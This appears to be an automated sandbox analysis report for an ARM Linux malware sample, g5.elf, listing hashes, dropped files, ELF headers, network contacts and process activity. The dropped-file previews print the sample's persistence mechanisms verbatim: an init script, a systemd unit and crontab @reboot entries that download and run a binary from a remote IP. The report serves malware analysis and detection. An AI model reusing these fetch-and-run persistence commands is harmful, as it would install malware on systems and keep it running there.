                                invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                g6.elfGet hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                ASGHOSTNETDEg6.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g3.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g4.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g3.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g5.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g4.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g6.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g3.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                ppc.elfGet hashmaliciousMiraiBrowse
                                • 5.175.194.122
                                x86.elfGet hashmaliciousMiraiBrowse
                                • 5.175.146.210
                                No context
                                No context
                                Process:/tmp/g5.elf
                                File Type:Bourne-Again shell script, ASCII text executable
                                Category:dropped
                                Size (bytes):623
                                Entropy (8bit):4.744076344567651
                                Encrypted:false
                                SSDEEP:12:i5BpMp5kTMp5Gu+a6Hqaxy259srxylKNVUdURucTyl:ifpMr8MrPd6HqGyAsrxy8bp4
                                MD5:E94C25729BA7B3185679695A83C869D9
                                SHA1:208C48A4B29355BACF3E7BCEEA8A0F7A1E02B51C
                                SHA-256:6A3AC9863C36B9D71E1A1A5873AF45ECE528D8EC3FEC25BA0F7219163B526FEA
                                SHA-512:728FD2727244895CB731FE2DDCBFA23977958010ED2916E4EFC0AC7D98809767AEA66B46112B458B7091FCEDDF8AB575D4230D4E50DF9A2CD4A9A578F09D7C35
                                Malicious:true
                                Reputation:low
                                Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A arm..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                                Process:/tmp/g5.elf
                                File Type:troff or preprocessor input, ASCII text
                                Category:dropped
                                Size (bytes):319
                                Entropy (8bit):5.267839685068323
                                Encrypted:false
                                SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOApF5C1Y0IEkqTsCBLQmWA4Rv:zb9RZADJiIE+moqax2FLHWrv
                                MD5:C3D8C7F8106591224717CA273DF8D127
                                SHA1:65814BA93DCF866D25FF5303F1B8808A12C74033
                                SHA-256:94FEA607B37C26436ADCC16C9F793A7D7E64344FF7822B8C3A7FE5069CAC9881
                                SHA-512:0B14F4BC85C23D36E13675988753144FE8DC5FE934D82BC4F62148AC4C5B4F4D5B70E25F2C4E6E139323E2EA90F0898A7C19D1A0ECB6B0566BC30D2EAC164CB1
                                Malicious:false
                                Reputation:low
                                Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A arm..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):76
                                Entropy (8bit):3.7627880354948586
                                Encrypted:false
                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                Process:/tmp/g5.elf
                                File Type:troff or preprocessor input, ASCII text
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):4.808493362967243
                                Encrypted:false
                                SSDEEP:3:SH3YFKKpeMPHRCnTAzSGuVY0IUU0XzeVpFw2sePn:SH3opF5C1Y0IEkrw5Cn
                                MD5:4D55D50BC0D6BBAEED57BE8A2B8FB9B1
                                SHA1:42A04D6F4251359B5E94F168A39D63F465D8848E
                                SHA-256:FB2626D62CB1CC5765CD4FBAD56FC0A337D64012935A7C424B62EF27EC950AB6
                                SHA-512:1D4DC4FDEBA8DDEA3525F14A44973E35D62A329D1CA84AA3116560D00CC5D0A6452A8A3B80940923F3BB9639FF5D761C66C65223DF63092F9FB3839CFD56FE13
                                Malicious:true
                                Reputation:low
                                Preview:@rebootrm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                                Process:/tmp/g5.elf
                                File Type:zlib compressed data
                                Category:dropped
                                Size (bytes):259
                                Entropy (8bit):3.438286641351372
                                Encrypted:false
                                SSDEEP:3:FV5IX9FQWUT+b9XSVoHXSY/VUWV/FFFQWUT+b9X53/l/VVdf/FVLADsVHI1v/VVP:Og2o7Y/VUS/FY29/VjmsVot/VOArB/VF
                                MD5:0A800C1D11AF22EC398659687454B6B0
                                SHA1:9CEF45ED0756E648EC06E6AE2A9067E9CBDBB8DA
                                SHA-256:C87BBFA8BA23FB557E5AB7AD80CC2CCD285C7CC79111243CCA056770136A3020
                                SHA-512:6F83E91CD6D884DE2C6AA5853C27788BF44040DEBFD21A67CC0D200625157374CFE91B8A3A95E3345F3013499880066B075B907F343C520C575BDC5E3B82489B
                                Malicious:false
                                Reputation:low
                                Preview:8000-1b000 r-xp 00000000 fd:00 531601 /tmp/g5.elf.23000-24000 rw-p 00013000 fd:00 531601 /tmp/g5.elf.24000-2a000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                                Process:/usr/bin/crontab
                                File Type:troff or preprocessor input, ASCII text
                                Category:dropped
                                Size (bytes):330
                                Entropy (8bit):5.251625498927279
                                Encrypted:false
                                SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ355iGMQ5UYLtCFt3HYopF5C1Y0IEkrw5Cn:8Qj7QEuLut8XUeHLUHYwqaxP9
                                MD5:F758ECF7EFFD01B63ADBFAD69139BD2E
                                SHA1:2F8A9E50291C92CFC8F814E9A6B5422FF971506E
                                SHA-256:D6ABE27320906FCF8F50C895315B527E20B74066813F94DF0DD0C73010A6C9E2
                                SHA-512:0FBE1F141A9C7B7764DE785221BB176236C264DBDD767B9DD7111EBAEE20E6DA9CCA1D0A68E592F8C824AD166CB6B92131BCA6FE2AB6DE56A47A854A21345A29
                                Malicious:true
                                Reputation:low
                                Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Mon Jan 13 03:58:04 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                Entropy (8bit):6.103084233799011
                                TrID:
                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                File name:g5.elf
                                File size:79'764 bytes
                                MD5:a31c5120545d3d83e30e3112babeb090
                                SHA1:b13f64e6fa99c9cc2273f476b3ffb19d67786bea
                                SHA256:3a3df579db037959687c6e759bf139097f527f3143ffacc0000b7c6f6ce1e6ab
                                SHA512:9a65cbe994ffed548e00d91cc9bc5915722c2b389cc5f427ce5f8297a251798ec18909edaace8bc78600217bf4767a401b28560b79460838b3f346be4bfd53ec
                                SSDEEP:1536:PbSna0PAeU9itJB+Zn5+C63+sMPiT7NNzYdnDgIZgTeg:T9in4o7NNzYd0JT
                                TLSH:8C730956F9815B42C5D402BB7A1E569E33076BA8E3DE3313DD241B24778B62F0F27906
                                File Content Preview:.ELF..............(.....T...4....5......4. ...(......................-...-...............0...0...0..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..5.......0....-.@0....S

                                ELF header

                                Class:ELF32
                                Data:2's complement, little endian
                                Version:1 (current)
                                Machine:ARM
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - System V
                                ABI Version:0
                                Entry Point Address:0x8154
                                Flags:0x4000002
                                ELF Header Size:52
                                Program Header Offset:52
                                Program Header Size:32
                                Number of Program Headers:3
                                Section Header Offset:79244
                                Section Header Size:40
                                Number of Section Headers:13
                                Header String Table Index:12
                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                NULL0x00x00x00x00x0000
                                .initPROGBITS0x80940x940x100x00x6AX004
                                .textPROGBITS0x80b00xb00x113800x00x6AX0016
                                .finiPROGBITS0x194300x114300x100x00x6AX004
                                .rodataPROGBITS0x194400x114400x19440x00x2A004
                                .eh_framePROGBITS0x230000x130000x40x00x3WA004
                                .init_arrayINIT_ARRAY0x230040x130040x40x00x3WA004
                                .fini_arrayFINI_ARRAY0x230080x130080x40x00x3WA004
                                .gotPROGBITS0x230100x130100x740x40x3WA004
                                .dataPROGBITS0x230840x130840x4900x00x3WA004
                                .bssNOBITS0x235140x135140x29980x00x3WA004
                                .ARM.attributesARM_ATTRIBUTES0x00x135140x100x00x0001
                                .shstrtabSTRTAB0x00x135240x670x00x0001
                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                LOAD0x00x80000x80000x12d840x12d846.12570x5R E0x8000.init .text .fini .rodata
                                LOAD0x130000x230000x230000x5140x2eac6.01510x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 13, 2025 10:58:04.232738018 CET3662953192.168.2.131.1.1.1
                                Jan 13, 2025 10:58:04.237752914 CET53366291.1.1.1192.168.2.13
                                Jan 13, 2025 10:58:04.237834930 CET3662953192.168.2.131.1.1.1
                                Jan 13, 2025 10:58:04.237890959 CET3662953192.168.2.131.1.1.1
                                Jan 13, 2025 10:58:04.242908955 CET53366291.1.1.1192.168.2.13
                                Jan 13, 2025 10:58:04.243109941 CET3662953192.168.2.131.1.1.1
                                Jan 13, 2025 10:58:04.988400936 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:58:04.993530035 CET56255210677.90.22.16192.168.2.13
                                Jan 13, 2025 10:58:04.993616104 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:58:04.996079922 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:58:05.001379013 CET56255210677.90.22.16192.168.2.13
                                Jan 13, 2025 10:58:35.251604080 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:58:35.256714106 CET56255210677.90.22.16192.168.2.13
                                Jan 13, 2025 10:59:05.971482038 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:59:05.976511002 CET56255210677.90.22.16192.168.2.13
                                Jan 13, 2025 10:59:16.071578026 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:59:16.076441050 CET56255210677.90.22.16192.168.2.13
                                Jan 13, 2025 10:59:16.247797012 CET56255210677.90.22.16192.168.2.13
                                Jan 13, 2025 10:59:16.247921944 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:59:46.931538105 CET521065625192.168.2.1377.90.22.16
                                Jan 13, 2025 10:59:46.936527967 CET56255210677.90.22.16192.168.2.13

                                System Behavior

                                Start time (UTC):09:57:59
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:/tmp/g5.elf
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/systemctl
                                Arguments:systemctl daemon-reload
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/systemctl
                                Arguments:systemctl start hello.service
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/crontab
                                Arguments:crontab /tmp/crontab.tmp
                                File size:43720 bytes
                                MD5 hash:66e521d421ac9b407699061bf21806f5

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g5.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:58:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:58:01
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:58:01
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:58:01
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:58:01
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/systemd/systemd
                                Arguments:-
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                Start time (UTC):09:58:03
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                File size:22760 bytes
                                MD5 hash:3633b075f40283ec938a2a6a89671b0e